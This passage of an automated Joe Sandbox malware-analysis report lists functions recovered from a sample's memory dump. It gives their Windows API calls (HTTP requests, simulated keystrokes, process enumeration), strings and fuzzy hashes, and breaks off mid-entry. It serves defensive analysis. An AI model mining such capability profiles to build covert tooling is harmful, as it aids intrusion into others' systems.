Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: a964cd735af77ce77ade06642742f81ae1485a12f4d7aefe5d8ede5753eb2cca
Instruction ID: c92e76830c4e85609e00141322f7f35f66b764f9c3269e17dd281c931ceaf131
Opcode Fuzzy Hash: a964cd735af77ce77ade06642742f81ae1485a12f4d7aefe5d8ede5753eb2cca
Instruction Fuzzy Hash: CA215E31500204FFDB21AB78EC48BEA7BB6EB05321F10C624FA26951E2DB350D51EF25

Function 006CD978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,006CDD46), ref: 006CDC86

Strings

REGEXPCLASS, xrefs: 006CDA4C
CLASS, xrefs: 006CDA06
TEXT, xrefs: 006CDBBD
NAME, xrefs: 006CDAB8
INSTANCE, xrefs: 006CDB94
CLASSNN, xrefs: 006CDA29

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: af9b7f5fc5b7aca080cd75082d8e8a243c695706be1b60a515970f99d65273b3
Instruction ID: 8587113fac01e19fc70ea52ac35a8089b144d61293d855581de2692dc3211eb9
Opcode Fuzzy Hash: af9b7f5fc5b7aca080cd75082d8e8a243c695706be1b60a515970f99d65273b3
Instruction Fuzzy Hash: 7F9181B0A00506AACB48EF64C481FF9FB77FF05350F54813DE85AA7251DB34699ACBA4

Function 006945A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 006945F0
CoUninitialize.COMBASE ref: 00694695
UnregisterHotKey.USER32(?), ref: 006947BD
DestroyWindow.USER32(?), ref: 00705936
FreeLibrary.KERNEL32(?), ref: 0070599D
VirtualFree.KERNEL32(?,00000000,00008000), ref: 007059CA

Strings

close all, xrefs: 006945EB

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: fec79582eea86aa1e8bb687985ee7e7cafb0ae98fae7c9fcf4c4d83bde3aebae
Instruction ID: 9a698e97eff19ae271b9537830af0e01d0b297dab9404a20eda8785949844691
Opcode Fuzzy Hash: fec79582eea86aa1e8bb687985ee7e7cafb0ae98fae7c9fcf4c4d83bde3aebae
Instruction Fuzzy Hash: 20914C70610602DFCB55EF14C895E69F3EABF15304F5182ADE40A976A2DF34AD5ACF08

Function 006AC24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 006AC2D2

Part of subcall function 006AC697: GetClientRect.USER32(?,?), ref: 006AC6C0
Part of subcall function 006AC697: GetWindowRect.USER32(?,?), ref: 006AC701
Part of subcall function 006AC697: ScreenToClient.USER32(?,?), ref: 006AC729

GetDC.USER32 ref: 0070E006
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0070E019
SelectObject.GDI32(00000000,00000000), ref: 0070E027
SelectObject.GDI32(00000000,00000000), ref: 0070E03C
ReleaseDC.USER32(?,00000000), ref: 0070E044
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0070E0CF

Strings

U, xrefs: 0070DFA4

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: d70c171a84fc9543d09c74e2f81366dd9e369a1b9d0206ba2f707dfab227c9d0
Instruction ID: 932de81e5fb08baa25666f7cd198e9a8a9b67b81c7d1580ea8fd611763abc2f5
Opcode Fuzzy Hash: d70c171a84fc9543d09c74e2f81366dd9e369a1b9d0206ba2f707dfab227c9d0
Instruction Fuzzy Hash: 7E71DE31400209DFCF319FA4C880AEA7BB6FF49360F248669ED555A2E6C7399D41DF60

Function 006E4C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006E4C5E
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 006E4C8A
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 006E4CCC
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 006E4CE1
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006E4CEE
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 006E4D1E
InternetCloseHandle.WININET(00000000), ref: 006E4D65

Part of subcall function 006E56A9: GetLastError.KERNEL32(?,?,006E4A2B,00000000,00000000,00000001), ref: 006E56BE

Strings

, xrefs: 006E4D17

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: a40db462d21f53380f346a0480916568d52a64db9dbbefba848b675af3e21096
Instruction ID: c4b7c91aba70f99ef3dfd7b454a109f25bdbd2bf86acd72d4c86ff937d94feaf
Opcode Fuzzy Hash: a40db462d21f53380f346a0480916568d52a64db9dbbefba848b675af3e21096
Instruction Fuzzy Hash: 5141B0B1502318BFEB128F65CC89FFA77ADEF08754F10811AFA019A191DB749D418BA4

Function 006EBAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0072DBF0), ref: 006EBBA1
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0072DBF0), ref: 006EBBD5
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 006EBD33
SysFreeString.OLEAUT32(?), ref: 006EBD5D
StringFromGUID2.COMBASE(?,?,00000028), ref: 006EBEAD
ProgIDFromCLSID.COMBASE(?,?), ref: 006EBEF7
CoTaskMemFree.COMBASE(?), ref: 006EBF14

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
String ID:
API String ID: 793797124-0
Opcode ID: ddd6caf8d83542274c5085959f4156e0b54d2e6aafac7246742adb8489f7004c
Instruction ID: 2c82c3f8212d86d7b2f0bb357a9a0af3ad26b6d8693cfd59978b51083311afbf
Opcode Fuzzy Hash: ddd6caf8d83542274c5085959f4156e0b54d2e6aafac7246742adb8489f7004c
Instruction Fuzzy Hash: 0BF10871A01249EFCB14DFA5C884EEEB7BAFF89714F148499F905AB250DB31AD42CB50

Function 006AB86E Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 006949CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00694954,00000000), ref: 00694A23

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,006AB85B), ref: 006AB926
KillTimer.USER32(00000000,?,00000000,?,?,?,?,006AB85B,00000000,?,?,006AAF1E,?,?), ref: 006AB9BD
DestroyAcceleratorTable.USER32(00000000), ref: 0070E775
DeleteObject.GDI32(00000000), ref: 0070E7EB

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 2402799130-0
Opcode ID: 607d9ac5392c571bab7a2feadcfe24c68e3cb37730f1005b64704d5dfa962eda
Instruction ID: 372abe8e8ad68a3def4a98f58a2ecd64c0d0fa4af2e4673d7ede0a6092f49a54
Opcode Fuzzy Hash: 607d9ac5392c571bab7a2feadcfe24c68e3cb37730f1005b64704d5dfa962eda
Instruction Fuzzy Hash: 9B618F30500701CFDB35AF29D888BA6B7F6FF46322F149619E186866B1C779AC91CF48

Function 006FB14A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 006FB204

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: d2558dac2893c90482b23807a0446cde7d914f2f84c2a5015caf5ba5c2e30278
Instruction ID: 8b19ed7b37712266faa271f0a7797f3f4ef4b3560088a17528cdaac56daf720d
Opcode Fuzzy Hash: d2558dac2893c90482b23807a0446cde7d914f2f84c2a5015caf5ba5c2e30278
Instruction Fuzzy Hash: 88518F3164021CBEEB309B28CC95BFE7B67AB06364F20A115FB15D66E1C771ED508B54

Function 006AA599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0070E9EA
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0070EA0B
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0070EA20
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0070EA3D
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0070EA64
DestroyCursor.USER32(00000000), ref: 0070EA6F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0070EA8C
DestroyCursor.USER32(00000000), ref: 0070EA97

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CursorDestroyExtractIconImageLoadMessageSend
String ID:
API String ID: 3992029641-0
Opcode ID: afc5a970697c37459d76411281add42a0d0917759795553275b5e4640074c104
Instruction ID: 56390ad98e860d530d1d65d80262c6e07cc44d01aeba02f39786cc3a4f5d711b
Opcode Fuzzy Hash: afc5a970697c37459d76411281add42a0d0917759795553275b5e4640074c104
Instruction Fuzzy Hash: 99514870A00205EFDB20DFA8CC81FAA77E6AB49750F10862AF946972D0D7B4ED81DF55

Function 006AF6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0070E9A0,00000004,00000000,00000000), ref: 006AF737
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0070E9A0,00000004,00000000,00000000), ref: 006AF77E
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0070E9A0,00000004,00000000,00000000), ref: 0070EB55
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0070E9A0,00000004,00000000,00000000), ref: 0070EBC1

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 46c5fa50e2a528d368e970ea1f2b28a01457b23e7ffc74d024dd11b13a451d04
Instruction ID: b5737f6287259e8f1c9ff53ce1f1f238c6d014dc555225ea107ce477e3f530a2
Opcode Fuzzy Hash: 46c5fa50e2a528d368e970ea1f2b28a01457b23e7ffc74d024dd11b13a451d04
Instruction Fuzzy Hash: D2410B70204680DADB356768ACC8BA67AD76B47312F64492DE087426E1C6B9EC81CF17

Function 006CCDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 006CE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 006CE158
Part of subcall function 006CE138: GetCurrentThreadId.KERNEL32 ref: 006CE15F
Part of subcall function 006CE138: AttachThreadInput.USER32(00000000,?,006CCDFB,?,00000001), ref: 006CE166

MapVirtualKeyW.USER32(00000025,00000000), ref: 006CCE06
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 006CCE23
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 006CCE26
MapVirtualKeyW.USER32(00000025,00000000), ref: 006CCE2F
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 006CCE4D
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006CCE50
MapVirtualKeyW.USER32(00000025,00000000), ref: 006CCE59
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 006CCE70
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006CCE73

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 56a1cb7b3ba2a74e10966f22ef89f21c86a827ce1cb8d217e5eac5a68faf162e
Instruction ID: f88d7dce3c1d63b33fcf37a1091c7b06a3213b6f49e2b06a2f9184985b61447b
Opcode Fuzzy Hash: 56a1cb7b3ba2a74e10966f22ef89f21c86a827ce1cb8d217e5eac5a68faf162e
Instruction Fuzzy Hash: DE1104B155061CBEF7202F688C8EFAA3B2DDB0C794F114419F3406B0E0C9F6AC119EA8

Function 006EC604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 006CA857: CLSIDFromProgID.COMBASE ref: 006CA874
Part of subcall function 006CA857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 006CA88F
Part of subcall function 006CA857: lstrcmpiW.KERNEL32(?,00000000), ref: 006CA89D
Part of subcall function 006CA857: CoTaskMemFree.COMBASE(00000000), ref: 006CA8AD

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 006EC6AD
_memset.LIBCMT ref: 006EC6BA
_memset.LIBCMT ref: 006EC7D8
CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 006EC804
CoTaskMemFree.COMBASE(?), ref: 006EC80F

Strings

NULL Pointer assignment, xrefs: 006EC85D

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 249e3de083b8a572f399ac3ed29183b14f43a747f4cc4d47339bed75afa41a89
Instruction ID: 8f43bd2c3c8ba59d58fc3b0aee1580ad4ac5b1c72085f143287ab29db4ab6960
Opcode Fuzzy Hash: 249e3de083b8a572f399ac3ed29183b14f43a747f4cc4d47339bed75afa41a89
Instruction Fuzzy Hash: ED912971D01218ABDF10DFA5DC85EDEBBBAEF09720F10812AF519A7281DB705A45CFA4

Function 006F1AD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 006F1B09
Process32FirstW.KERNEL32(00000000,?), ref: 006F1B17
__wsplitpath.LIBCMT ref: 006F1B45

Part of subcall function 006B297D: __wsplitpath_helper.LIBCMT ref: 006B29BD

_wcscat.LIBCMT ref: 006F1B5A
Process32NextW.KERNEL32(00000000,?), ref: 006F1BD0
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 006F1BE2

Strings

hEt, xrefs: 006F1AED

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID: hEt
API String ID: 1380811348-1675841007
Opcode ID: d359885bf56818c53b6f6479d926ed775709493d9b7553be2715900cda7aef5f
Instruction ID: d7513037da2b5052417313d142d57761f5995e3ff4e07fd2ecc606b60d701cd2
Opcode Fuzzy Hash: d359885bf56818c53b6f6479d926ed775709493d9b7553be2715900cda7aef5f
Instruction Fuzzy Hash: F3519071504305AFC720EF24C885EABB7EDEF89754F00492EF58997291EB30EA04CB96

Function 006F9882 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 006F9926
SendMessageW.USER32(?,00001036,00000000,?), ref: 006F993A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 006F9954
_wcscat.LIBCMT ref: 006F99AF
SendMessageW.USER32(?,00001057,00000000,?), ref: 006F99C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 006F99F4

Strings

SysListView32, xrefs: 006F98F8

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 064bae185440cc525317056e85ecb66fc3ad890e6e67560dc7d250106e57d46a
Instruction ID: 929c49ba5f6ddfc549801504419d5c65d150217d4c71193057db631c7f4f0dbe
Opcode Fuzzy Hash: 064bae185440cc525317056e85ecb66fc3ad890e6e67560dc7d250106e57d46a
Instruction Fuzzy Hash: 1741B47190030CAFEF219FA4C885FEE77B9EF09354F10482AF695A7291C7759D848B64

Function 006F1620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 006D6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 006D6F7D
Part of subcall function 006D6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 006D6F8D
Part of subcall function 006D6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 006D7022

